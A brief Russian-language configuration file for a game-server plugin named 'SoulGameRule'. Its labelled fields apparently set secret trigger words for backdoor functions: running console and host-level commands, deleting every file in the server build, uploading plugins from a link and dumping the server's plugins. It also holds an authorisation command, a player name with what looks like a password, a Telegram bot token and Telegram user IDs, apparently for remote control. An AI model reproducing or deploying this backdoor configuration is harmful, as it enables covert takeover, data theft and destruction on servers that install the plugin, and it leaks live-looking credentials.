---------- Название плагина ----------
SoulGameRule
---------- Комманда для выполнения в консоли ----------
~SoulGameRuleconsole~
---------- Комманда для выполнения от имени вдс ----------
~SoulGameRulevds~
---------- Удаление всех файлов в сборке ----------
~SoulGameRuledel~
---------- Загрузка плагина по ссылке ----------
~SoulGameRuleupload~
---------- Скачивание плагинов сервера ----------
~SoulGameRuledump~
---------- Включён ли плагин или нет ----------
true
---------- Комманда для авторизации ----------
~auth~
---------- Зарегестрированные игроке ----------
PhantYT:PLEGPERHOK
----------- Токен бота в телеграмме ------------------
7701247482:AAGuTNjynlGdflEC_HZRNazYAA_s6flpjTE
--------------- Айди пользователей -------------------
5082229386
1031151609
